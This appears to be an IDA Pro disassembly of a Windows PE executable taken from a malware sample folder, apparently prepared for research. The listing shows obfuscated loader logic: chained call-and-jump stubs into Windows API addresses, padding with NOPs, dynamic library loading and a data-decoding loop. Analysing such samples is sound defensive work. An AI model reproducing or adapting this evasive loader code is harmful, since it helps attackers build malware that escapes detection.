;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	0CF67EF83ED947547713C9033EE4B813
; Input	CRC32 :	405BC5A0

; File Name   :	C:\Users\farhadi\Desktop\509_Malware\0cf67ef83ed947547713c9033ee4b813
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00001780 (   6016.)
; Section size in file		: 00001800 (   6144.)
; Offset to raw	data for section: 0004E400
; Flags	60000020: Text Executable Readable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		db 30h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401030	proc near		; CODE XREF: sub_401154+6p

var_8		= dword	ptr -8

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 40h
		lea	eax, [esi-14h]
		or	[ebp+var_8], eax
		push	eax
		push	edx
		push	edi
		call	sub_401CBC
		add	esp, 8
		pop	eax
		push	eax
		rep call sub_401058
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401030	endp


; =============== S U B	R O U T	I N E =======================================


sub_401058	proc near		; CODE XREF: sub_401030+1Bp
		pop	ecx
		call	ecx
		pop	eax
		push	eax

loc_40105D:				; CODE XREF: sub_40106E+5j
		lea	ebx, [eax-54h]
		push	ebx
		rep call sub_40106E
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401058	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40106E	proc near		; CODE XREF: sub_401058+9p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short loc_40105D
		pop	eax
		add	esp, 40h
		pop	ebp
		retn	0
sub_40106E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401080	proc near		; CODE XREF: sub_401A24+1Cp

var_28		= dword	ptr -28h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 58h
		lea	esi, [ebx-19Ch]
		and	[ebp+var_28], 5FA9h
		push	0
		rep call sub_4010A4
		mov	eax, ds:SetLastError
		jmp	eax
sub_401080	endp


; =============== S U B	R O U T	I N E =======================================


sub_4010A4	proc near		; CODE XREF: sub_401080+17p
		pop	ecx
		call	ecx
		push	esi
		push	edx
		push	dword ptr [esi+240h]
		call	sub_4014C0
		add	esp, 8
		pop	esi
		push	0
		rep call sub_4010C7
		mov	eax, ds:LocalFree
		jmp	eax
sub_4010A4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4010C7	proc near		; CODE XREF: sub_4010A4+16p
		pop	ecx
		call	ecx
		add	esp, 58h
		pop	ebp
		retn	0
sub_4010C7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4010D4	proc near		; CODE XREF: sub_40164E+Bp
		mov	edi, edi
		push	ebp

loc_4010D7:				; CODE XREF: sub_4010D4+14j
		mov	ebp, esp
		sub	esp, 24h
		lea	edi, dword_4BA2E4
		cmp	edi, 256Ah
		jb	short loc_4010D7
		mov	eax, 0
		push	eax
		rep call sub_4010FD
		mov	eax, ds:PulseEvent
		jmp	eax
sub_4010D4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4010FD	proc near		; CODE XREF: sub_4010D4+1Cp
		pop	ecx
		call	ecx
		push	edi
		push	ecx
		push	dword ptr [edi+330h]
		push	esi
		call	sub_4017CC
		add	esp, 0Ch
		pop	edi
		mov	edx, 0
		push	edx
		rep call sub_401125
		mov	eax, ds:CloseHandle
		jmp	eax
sub_4010FD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401125	proc near		; CODE XREF: sub_4010FD+1Bp
		pop	ecx
		call	ecx
		add	esp, 24h
		pop	ebp
		retn	0
sub_401125	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401130	proc near		; CODE XREF: sub_401AF0+Cp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 3Ch
		mov	esi, offset asc_4BA068 ; "					 "...
		and	dword ptr [esi+70h], 0FFFFFFA2h
		mov	edi, 0
		push	edi
		rep call sub_401154
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_401130	endp


; =============== S U B	R O U T	I N E =======================================


sub_401154	proc near		; CODE XREF: sub_401130+17p
		pop	ecx
		call	ecx
		push	esi
		push	edi
		push	ebx
		call	sub_401030
		add	esp, 8
		pop	esi
		mov	ebx, 0
		push	ebx
		rep call sub_401176
		mov	eax, ds:LocalFree
		jmp	eax
sub_401154	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401176	proc near		; CODE XREF: sub_401154+15p
		pop	ecx
		call	ecx
		add	esp, 3Ch
		pop	ebp
		retn	0
sub_401176	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401180	proc near		; CODE XREF: sub_4016B0+22p

var_64		= dword	ptr -64h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		xor	dword ptr [edi+14h], 0FFFFFF99h
		lea	edx, asc_4BA068	; "					  "...
		push	edx
		mov	edx, 6B4h
		push	edx
		mov	edx, 6B4h
		push	edx
		mov	eax, 40001h
		push	eax
		mov	ebx, 0B9C59E19h
		push	dword ptr [ebx+467A9213h]
		sub	[esp+64h+var_64], 2
		mov	ebx, offset LoadLibraryW
		pop	dword ptr [ebx]
		rep call sub_4011C8
		mov	eax, ds:LoadLibraryW
		jmp	eax
sub_401180	endp


; =============== S U B	R O U T	I N E =======================================


sub_4011C8	proc near		; CODE XREF: sub_401180+3Bp

arg_0		= dword	ptr  4

		pop	ecx
		call	ecx
		xchg	eax, [esp-4+arg_0]
		mov	edx, eax
		pop	dword ptr [edx+284h]
		mov	eax, [edx+284h]
		lea	esi, [eax]
		sub	eax, eax
		dec	eax
		and	eax, offset word_4020BE
		mov	edi, 22419A76h
		push	dword ptr [eax]
		pop	dword ptr [esi]
		add	eax, 1
		add	esi, 1
		push	6B4h
		pop	ecx

loc_4011FB:				; CODE XREF: sub_4011C8+51j
		xor	ebx, ebx
		push	dword ptr [eax]
		adc	[esp-4+arg_0], edi
		pop	dword ptr [esi+ebx*2]
		sub	edi, edi
		sbb	edi, [eax+edi*4]
		neg	edi
		shr	edi, 1
		add	eax, 4
		add	esi, 4
		sub	ecx, 4
		test	ecx, ecx
		jnz	short loc_4011FB
		push	edx
		push	0
		rep call sub_40122B
		mov	eax, ds:IsWindow
		jmp	eax
sub_4011C8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40122B	proc near		; CODE XREF: sub_4011C8+56p
		pop	ecx
		call	ecx
		pop	edx
		add	esp, 50h
		pop	ebp
		retn	0
sub_40122B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401238	proc near		; CODE XREF: start+43j

var_C		= dword	ptr -0Ch

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		lea	ecx, dword_4BA3AC
		sbb	edx, [ebp+var_C]
		push	ecx
		push	dword ptr [ecx+210h]
		push	dword ptr [ecx+31Ch]
		call	sub_401DC4
		add	esp, 8
		pop	ecx
		push	ecx
		mov	edx, 0
		push	edx
		rep call sub_401273
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_401238	endp


; =============== S U B	R O U T	I N E =======================================


sub_401273	proc near		; CODE XREF: sub_401238+2Ep
		pop	ecx
		call	ecx
		pop	ecx
		mov	eax, offset GetModuleHandleA
		mov	eax, [eax]
		push	eax
		push	dword ptr [ecx-0C0h]
		pop	ebx
		call	ebx
		add	esp, 38h
		pop	ebp
		retn	0
sub_401273	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 91h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401320	proc near		; CODE XREF: sub_401A7C+19p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		mov	edx, offset dword_4BA1C4
		xor	edi, [edx+1D0h]
		push	edx
		mov	eax, 0
		push	eax
		rep call sub_401347
		mov	eax, ds:GetDC
		jmp	eax
sub_401320	endp


; =============== S U B	R O U T	I N E =======================================


sub_401347	proc near		; CODE XREF: sub_401320+1Ap
		pop	ecx
		call	ecx
		pop	edx
		push	edx
		push	dword ptr [edx+2E0h]
		push	dword ptr [edx+2F8h]
		push	dword ptr [edx+0C4h]
		call	sub_4015A4
		add	esp, 0Ch
		pop	edx
		push	edx
		push	0
		rep call sub_401377
		mov	eax, ds:lstrlenA
		jmp	eax
sub_401347	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401377	proc near		; CODE XREF: sub_401347+23p
		pop	ecx
		call	ecx
		pop	edx
		add	esp, 50h
		pop	ebp
		retn	0
sub_401377	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 92h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401414	proc near		; CODE XREF: sub_401F43+6p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 3Ch
		lea	ecx, dword_4BA2A4
		sub	dword ptr [ecx-18Ch], 0FFFFFFF4h
		push	ecx
		push	eax
		push	ebx
		push	dword ptr [ecx+0C4h]
		call	sub_401D14
		add	esp, 0Ch
		pop	ecx
		push	ecx
		rep call sub_401449
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401414	endp


; =============== S U B	R O U T	I N E =======================================


sub_401449	proc near		; CODE XREF: sub_401414+28p
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		push	0
		rep call sub_40145D
		mov	eax, ds:SetEvent
		jmp	eax
sub_401449	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40145D	proc near		; CODE XREF: sub_401449+7p
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 3Ch
		pop	ebp
		retn	0
sub_40145D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401468	proc near		; CODE XREF: sub_4018FE+Cp
		mov	edi, edi
		push	ebp

loc_40146B:				; CODE XREF: sub_401468+11j
		mov	ebp, esp
		sub	esp, 4Ch
		lea	ecx, [eax+78h]
		cmp	ecx, 641Ah
		jb	short loc_40146B
		push	ecx
		push	0
		rep call sub_40148B
		mov	eax, ds:lstrlenA
		jmp	eax
sub_401468	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40148B	proc near		; CODE XREF: sub_401468+16p
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		push	dword ptr [ecx+100h]
		push	ebx
		push	dword ptr [ecx+0D8h]
		call	sub_401E44
		add	esp, 0Ch
		pop	ecx
		push	ecx
		rep call sub_4014B4
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_40148B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4014B4	proc near		; CODE XREF: sub_40148B+1Cp
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 4Ch
		pop	ebp
		retn	0
sub_4014B4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4014C0	proc near		; CODE XREF: sub_4010A4+Bp

var_10		= dword	ptr -10h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		mov	ebx, offset dword_4BA148
		mov	[ebp+var_10], 306Eh
		push	ebx
		push	dword ptr [ebx+1FCh]
		push	esi
		call	sub_401C34
		add	esp, 8
		pop	ebx
		mov	eax, 0
		push	eax
		rep call sub_4014F8
		mov	eax, ds:SetFocus
		jmp	eax
sub_4014C0	endp


; =============== S U B	R O U T	I N E =======================================


sub_4014F8	proc near		; CODE XREF: sub_4014C0+2Bp
		pop	ecx
		call	ecx
		push	0
		rep call sub_40150A
		mov	eax, ds:SetEvent
		jmp	eax
sub_4014F8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40150A	proc near		; CODE XREF: sub_4014F8+5p
		pop	ecx
		call	ecx
		add	esp, 24h
		pop	ebp
		retn	0
sub_40150A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 90h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4015A4	proc near		; CODE XREF: sub_401347+17p

var_40		= dword	ptr -40h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		mov	esi, offset dword_4BA3B0
		or	[ebp+var_40], 0FFFFFFBCh
		push	0
		rep call sub_4015C4
		mov	eax, ds:LocalFree
		jmp	eax
sub_4015A4	endp


; =============== S U B	R O U T	I N E =======================================


sub_4015C4	proc near		; CODE XREF: sub_4015A4+13p
		pop	ecx
		call	ecx
		push	esi
		push	dword ptr [esi+2F0h]
		push	eax
		push	ebx
		call	sub_401F20
		add	esp, 0Ch
		pop	esi
		mov	edx, 0
		push	edx
		rep call sub_4015EC
		mov	eax, ds:SetFocus
		jmp	eax
sub_4015C4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4015EC	proc near		; CODE XREF: sub_4015C4+1Bp
		pop	ecx
		call	ecx
		add	esp, 54h
		pop	ebp
		retn	0
sub_4015EC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 32h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401628	proc near		; CODE XREF: sub_401DE4+Ep
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 4Ch
		mov	eax, offset dword_4BA004
		sub	dword ptr [eax+150h], 22h
		push	eax

loc_40163D:				; CODE XREF: sub_40164E+5j
		lea	edi, [eax-4]
		push	edi
		rep call sub_40164E
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401628	endp


; =============== S U B	R O U T	I N E =======================================


sub_40164E	proc near		; CODE XREF: sub_401628+19p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short loc_40163D
		pop	eax
		push	eax
		push	ebx
		push	edx
		call	sub_4010D4
		add	esp, 8
		pop	eax
		push	eax
		push	0
		rep call sub_401672
		mov	eax, ds:GetDC
		jmp	eax
sub_40164E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401672	proc near		; CODE XREF: sub_40164E+17p
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 4Ch
		pop	ebp
		retn	0
sub_401672	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 33h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4016B0	proc near		; CODE XREF: sub_401E68+6p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	edi, (offset aSaduDll+10h)
		mov	edx, eax
		push	edi
		push	dword ptr [edi+2B4h]
		push	dword ptr [edi+2B4h]
		push	dword ptr [edi+18Ch]
		call	sub_401180
		add	esp, 0Ch
		pop	edi
		mov	ebx, 0
		push	ebx
		rep call sub_4016EE
		mov	eax, ds:LocalFree
		jmp	eax
sub_4016B0	endp


; =============== S U B	R O U T	I N E =======================================


sub_4016EE	proc near		; CODE XREF: sub_4016B0+31p
		pop	ecx
		call	ecx
		push	0
		rep call sub_401700
		mov	eax, ds:SetFocus
		jmp	eax
sub_4016EE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401700	proc near		; CODE XREF: sub_4016EE+5p
		pop	ecx
		call	ecx
		add	esp, 30h
		pop	ebp
		retn	0
sub_401700	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0C2h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4017CC	proc near		; CODE XREF: sub_4010FD+Cp
		mov	edi, edi
		push	ebp

loc_4017CF:				; CODE XREF: sub_4017CC+13j
		mov	ebp, esp
		sub	esp, 60h
		mov	edx, offset dword_4BA19C
		cmp	edx, 1603h
		jz	short loc_4017CF
		push	edx
		push	edi
		push	dword ptr [edx+20h]
		push	ebx
		push	dword ptr [edx+0B8h]
		call	sub_401A7C
		add	esp, 10h
		pop	edx
		push	edx
		mov	edx, 0
		push	edx
		rep call sub_40180A
		mov	eax, ds:SetEvent
		jmp	eax
sub_4017CC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40180A	proc near		; CODE XREF: sub_4017CC+31p
		pop	ecx
		call	ecx
		pop	edx
		push	edx
		mov	eax, 0
		push	eax
		rep call sub_401822
		mov	eax, ds:GetDC
		jmp	eax
sub_40180A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401822	proc near		; CODE XREF: sub_40180A+Bp
		pop	ecx
		call	ecx
		pop	edx
		add	esp, 60h
		pop	ebp
		retn	0
sub_401822	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================


		public start
start		proc near

var_4		= dword	ptr -4

		mov	ecx, offset lstrlenA
		push	0
		pop	eax
		nop
		nop
		nop
		nop
		call	ds:GetConsoleTitleA
		add	esp, 0FFFFFFF8h
		xor	eax, eax
		lea	eax, ds:4BA100h[eax*4]
		lea	ecx, [eax+0Ch]
		add	byte ptr [ecx],	4
		push	eax		; lpLibFileName
		call	ds:LoadLibraryW
		push	3Ch
		add	[esp+4+var_4], eax
		pop	ecx
		mov	ecx, [ecx]
		sub	ecx, 0FFFFFFAFh
		mov	eax, [eax+ecx]
		shr	eax, 4
		mov	cl, 25h
		cmp	al, cl
		pusha
		jg	short loc_401878
		jmp	sub_401238
; ---------------------------------------------------------------------------

loc_401878:				; CODE XREF: start+41j
		popa
		call	dword ptr [esp+0]
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4018DC	proc near		; CODE XREF: sub_401CD9+19p

var_30		= dword	ptr -30h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		lea	eax, [esi+30h]
		add	[ebp+var_30], 0FFFFA5E2h
		push	eax
		push	0
		rep call sub_4018FE
		mov	eax, ds:CloseHandle
		jmp	eax
sub_4018DC	endp


; =============== S U B	R O U T	I N E =======================================


sub_4018FE	proc near		; CODE XREF: sub_4018DC+15p
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		push	dword ptr [eax+310h]
		push	ebx
		call	sub_401468
		add	esp, 8
		pop	eax
		push	eax
		mov	edi, 0
		push	edi
		rep call sub_401927
		mov	eax, ds:Sleep
		jmp	eax
sub_4018FE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401927	proc near		; CODE XREF: sub_4018FE+1Cp
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 38h
		pop	ebp
		retn	0
sub_401927	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0F2h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401A24	proc near		; CODE XREF: sub_401B9E+Fp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 5Ch
		mov	ebx, offset dword_4BA3F4
		and	edx, [ebx-0C8h]
		push	ebx
		push	dword ptr [ebx+100h]
		push	ecx
		push	edx
		call	sub_401080
		add	esp, 0Ch
		pop	ebx
		rep call sub_401A56
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_401A24	endp


; =============== S U B	R O U T	I N E =======================================


sub_401A56	proc near		; CODE XREF: sub_401A24+25p
		pop	ecx
		call	ecx
		lea	esi, [ebx-3F4h]	; CODE XREF: sub_401A6D+5j
		push	esi
		rep call sub_401A6D
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401A56	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401A6D	proc near		; CODE XREF: sub_401A56+Ap
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short near ptr loc_401A59+1
		add	esp, 5Ch
		pop	ebp
		retn	0
sub_401A6D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401A7C	proc near		; CODE XREF: sub_4017CC+21p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 3Ch
		lea	eax, dword_4BA030
		xor	[eax+38h], edx
		push	eax
		push	edx
		push	dword ptr [eax+2E8h]
		call	sub_401320
		add	esp, 8
		pop	eax
		push	eax
		push	0
		rep call sub_401AAE
		mov	eax, ds:IsWindow
		jmp	eax
sub_401A7C	endp


; =============== S U B	R O U T	I N E =======================================


sub_401AAE	proc near		; CODE XREF: sub_401A7C+25p
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		rep call sub_401AC0
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401AAE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401AC0	proc near		; CODE XREF: sub_401AAE+5p
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 3Ch
		pop	ebp
		retn	0
sub_401AC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401ACC	proc near		; CODE XREF: sub_401C34+18p

var_20		= dword	ptr -20h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 5Ch
		lea	edi, dword_4BA3F0
		or	eax, [ebp+var_20]
		mov	eax, 0
		push	eax
		rep call sub_401AF0
		mov	eax, ds:SetEvent
		jmp	eax
sub_401ACC	endp


; =============== S U B	R O U T	I N E =======================================


sub_401AF0	proc near		; CODE XREF: sub_401ACC+17p
		pop	ecx
		call	ecx
		push	edi
		push	dword ptr [edi+194h]
		push	edx
		push	esi
		call	sub_401130
		add	esp, 0Ch
		pop	edi
		push	0
		rep call sub_401B14
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_401AF0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401B14	proc near		; CODE XREF: sub_401AF0+17p
		pop	ecx
		call	ecx
		add	esp, 5Ch
		pop	ebp
		retn	0
sub_401B14	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 62h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401B80	proc near		; CODE XREF: sub_401D34+Cp

var_48		= dword	ptr -48h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 4Ch
		mov	eax, offset dword_4BA1F8
		adc	edi, [ebp+var_48]
		push	eax
		rep call sub_401B9E
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401B80	endp


; =============== S U B	R O U T	I N E =======================================


sub_401B9E	proc near		; CODE XREF: sub_401B80+11p
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		push	edi
		push	dword ptr [eax]
		push	dword ptr [eax+17Ch]
		push	edi
		call	sub_401A24
		add	esp, 10h
		pop	eax
		push	eax
		push	0
		rep call sub_401BC6
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401B9E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401BC6	proc near		; CODE XREF: sub_401B9E+1Bp
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 4Ch
		pop	ebp
		retn	0
sub_401BC6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 63h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401C34	proc near		; CODE XREF: sub_4014C0+1Cp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 60h
		lea	edx, dword_4BA398
		sbb	ebx, 25h
		push	edx
		push	edi
		push	dword ptr [edx+18h]
		push	eax
		push	ebx
		call	sub_401ACC
		add	esp, 10h
		pop	edx
		push	edx
		mov	esi, 0
		push	esi
		rep call sub_401C69
		mov	eax, ds:Sleep
		jmp	eax
sub_401C34	endp


; =============== S U B	R O U T	I N E =======================================


sub_401C69	proc near		; CODE XREF: sub_401C34+28p
		pop	ecx
		call	ecx
		pop	edx
		push	edx
		mov	eax, 0
		push	eax
		rep call sub_401C81
		mov	eax, ds:CloseHandle
		jmp	eax
sub_401C69	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401C81	proc near		; CODE XREF: sub_401C69+Bp
		pop	ecx
		call	ecx
		pop	edx
		add	esp, 60h
		pop	ebp
		retn	0
sub_401C81	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 30h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401CBC	proc near		; CODE XREF: sub_401030+11p

var_20		= dword	ptr -20h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 58h
		lea	esi, [eax+44h]
		add	[ebp+var_20], edi
		push	0
		rep call sub_401CD9
		mov	eax, ds:lstrlenA
		jmp	eax
sub_401CBC	endp


; =============== S U B	R O U T	I N E =======================================


sub_401CD9	proc near		; CODE XREF: sub_401CBC+10p
		pop	ecx
		call	ecx
		push	esi
		push	dword ptr [esi+0A8h]
		push	dword ptr [esi+104h]
		push	dword ptr [esi+308h]
		push	dword ptr [esi+64h]
		call	sub_4018DC
		add	esp, 10h
		pop	esi
		rep call sub_401D08
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401CD9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401D08	proc near		; CODE XREF: sub_401CD9+22p
		pop	ecx
		call	ecx
		add	esp, 58h
		pop	ebp
		retn	0
sub_401D08	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401D14	proc near		; CODE XREF: sub_401414+1Ep
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		mov	esi, 4BA0D8h
		or	ebx, [esi-88h]
		rep call sub_401D34
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_401D14	endp


; =============== S U B	R O U T	I N E =======================================


sub_401D34	proc near		; CODE XREF: sub_401D14+13p
		pop	ecx
		call	ecx
		push	esi
		push	ebx
		push	dword ptr [esi+38Ch]
		push	edx
		call	sub_401B80
		add	esp, 0Ch
		pop	esi
		push	0
		rep call sub_401D58
		mov	eax, ds:PulseEvent
		jmp	eax
sub_401D34	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401D58	proc near		; CODE XREF: sub_401D34+17p
		pop	ecx
		call	ecx
		add	esp, 38h
		pop	ebp
		retn	0
sub_401D58	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 62h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401DC4	proc near		; CODE XREF: sub_401238+1Ep
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 54h
		lea	edi, dword_4BA048
		mov	eax, [edi-2Ch]
		push	0
		rep call sub_401DE4
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401DC4	endp


; =============== S U B	R O U T	I N E =======================================


sub_401DE4	proc near		; CODE XREF: sub_401DC4+13p
		pop	ecx
		call	ecx
		push	edi
		push	ecx
		push	dword ptr [edi]
		push	dword ptr [edi+3D8h]
		push	eax
		call	sub_401628
		add	esp, 10h
		pop	edi
		rep call sub_401E08
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401DE4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401E08	proc near		; CODE XREF: sub_401DE4+17p
		pop	ecx
		call	ecx
		add	esp, 54h
		pop	ebp
		retn	0
sub_401E08	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 32h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401E44	proc near		; CODE XREF: sub_40148B+12p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 4Ch
		lea	esi, [ecx+88h]
		sub	ebx, 0FFFFFFD8h
		mov	eax, 0
		push	eax
		rep call sub_401E68
		mov	eax, ds:SetFocus
		jmp	eax
sub_401E44	endp


